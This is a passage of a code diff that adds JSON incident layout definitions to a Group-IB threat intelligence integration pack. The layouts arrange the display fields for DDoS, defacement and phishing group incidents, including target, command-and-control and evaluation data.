"3d20eee0-70fd-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddosrequestbody", + "height": 22, + "id": "43ef7ca0-70fd-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddosrequestbodyhash", + "height": 22, + "id": "46060090-70fd-11ef-8b17-29df2efa74c4", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB DDOS Request", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-b47a7b10-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "c1a96b70-70fc-11ef-8b17-29df2efa74c4", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddosdatebegin", + "height": 22, + "id": "c53f3c60-70fc-11ef-8b17-29df2efa74c4", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddosdateend", + "height": 22, + "id": "ca42f530-70fc-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddosdateregistration", + "height": 22, + "id": "ccfbd3a0-70fc-11ef-8b17-29df2efa74c4", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddosduration", + "height": 22, + "id": "cff69d10-70fc-11ef-8b17-29df2efa74c4", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddosprotocol", + "height": 22, + "id": "d2ff2220-70fc-11ef-8b17-29df2efa74c4", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddossource", + "height": 22, + "id": "d7ee6890-70fc-11ef-8b17-29df2efa74c4", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddostype", + "height": 22, + "id": "db5b06a0-70fc-11ef-8b17-29df2efa74c4", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibmalwarename", + "height": 22, + "id": "de6bc910-70fc-11ef-8b17-29df2efa74c4", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "ac661e80-8492-11ef-87c7-cfae65ac92d0", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 1, + "y": 6 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-b53f51b0-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 2, + "fieldId": "gibddostargeturl", + "height": 22, + "id": "4a461ef0-7bf8-11ef-b550-d3d94250569e", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetasn", + "height": 22, + "id": "0dd319b0-70fd-11ef-8b17-29df2efa74c4", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetcity", + "height": 22, + "id": "10ab3ff0-70fd-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetregion", + "height": 22, + "id": "14a15950-70fd-11ef-8b17-29df2efa74c4", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetprovider", + "height": 22, + "id": "182b1c50-70fd-11ef-8b17-29df2efa74c4", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetcountrycode", + "height": 22, + "id": "1b1d8150-70fd-11ef-8b17-29df2efa74c4", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetcountryname", + "height": 22, + "id": "1dd26820-70fd-11ef-8b17-29df2efa74c4", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetip", + "height": 22, + "id": "230e9610-70fd-11ef-8b17-29df2efa74c4", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetport", + "height": 22, + "id": "266e89f0-70fd-11ef-8b17-29df2efa74c4", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetcategory", + "height": 22, + "id": "30898390-70fd-11ef-8b17-29df2efa74c4", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetdomain", + "height": 22, + "id": "4f34f030-7bf8-11ef-b550-d3d94250569e", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB DDOS Target", + "static": false, + "w": 1, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b741ff80-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "ee484d40-70fc-11ef-8b17-29df2efa74c4", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "f139a0d0-70fc-11ef-8b17-29df2efa74c4", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "f3f64fd0-70fc-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "f7294040-70fc-11ef-8b17-29df2efa74c4", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7fc9b9c0-7bf7-11ef-96a8-77b28953dd87", + "items": [ + { + "endCol": 2, + "fieldId": "gibcnc", + "height": 22, + "id": "869c8d40-7bf7-11ef-96a8-77b28953dd87", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcncdomain", + "height": 22, + "id": "8b595200-7bf7-11ef-96a8-77b28953dd87", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcncport", + "height": 22, + "id": "8d67bfa0-7bf7-11ef-96a8-77b28953dd87", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcncurl", + "height": 22, + "id": "8fc7cfb0-7bf7-11ef-96a8-77b28953dd87", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "CNC Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Attacks DDOS Layout", + "name": "GIB Attacks DDOS Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Deface_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Deface_Layout.json new file mode 100644 index 000000000000..c59b440d973b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Deface_Layout.json @@ -0,0 +1,618 @@ +{ + "description": "Layout for GIB Attacks Deface", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d63a3230-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibtargetasn", + "height": 22, + "id": "047e86a0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetcity", + "height": 22, + "id": "07d10d00-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcountrycode", + "height": 22, + "id": "0aa00b80-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcountryname", + "height": 22, + "id": "0d3a3e60-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetip", + "height": 22, + "id": "108e4b60-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetprovider", + "height": 22, + "id": "1379f9a0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetregion", + "height": 22, + "id": "1660ecf0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Target IP", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-d7447640-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "351ad4d0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibmirrorlink", + "height": 22, + "id": "390a3770-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "3bf7e180-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproviderdomain", + "height": 22, + "id": "3f09b560-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdefacesiteurl", + "height": 22, + "id": "424383a0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdefacesource", + "height": 22, + "id": "466f04e0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetdomain", + "height": 22, + "id": "49eedcd0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetdomainprovider", + "height": 22, + "id": "4f9a9570-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdefacedate", + "height": 22, + "id": "52975ab0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdefacecontacts", + "height": 22, + "id": "554bf360-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-e58fd320-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "20510600-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "239cae90-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "279cda10-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-e81c2350-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "f2a5e450-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "f5f4e840-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "f8c4aa10-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "fcba9c60-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Attacks Deface Layout", + "name": "GIB Attacks Deface Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json new file mode 100644 index 000000000000..5f79e9c80d17 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json @@ -0,0 +1,598 @@ +{ + "description": "Layout for GIB Attacks Phishing Group", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-754279f0-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "b2a49670-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibphishingbrand", + "height": 22, + "id": "dfc61020-7bf8-11ef-96a8-77b28953dd87", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibphishingobjectives", + "height": 22, + "id": "ef311e70-8246-11ef-a19b-c92b354e1f7d", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibphishingsources", + "height": 22, + "id": "f2cedea0-8246-11ef-a19b-c92b354e1f7d", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibphishingurls", + "height": 22, + "id": "fa275ce0-8246-11ef-a19b-c92b354e1f7d", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "e3f06950-8492-11ef-87c7-cfae65ac92d0", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 3, + "fieldId": "gibphishingkittable", + "height": 106, + "id": "69dbdc00-8247-11ef-a19b-c92b354e1f7d", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-75f52820-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "a881d4a0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "ab77bc10-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-76a31b60-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibphishingdateblocked", + "height": 22, + "id": "1ecdfe00-8247-11ef-a19b-c92b354e1f7d", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibphishingdateadded", + "height": 22, + "id": "21a84720-8247-11ef-a19b-c92b354e1f7d", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibphishingdatedetected", + "height": 22, + "id": "24215d70-8247-11ef-a19b-c92b354e1f7d", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-772f07b0-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "87de9350-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + 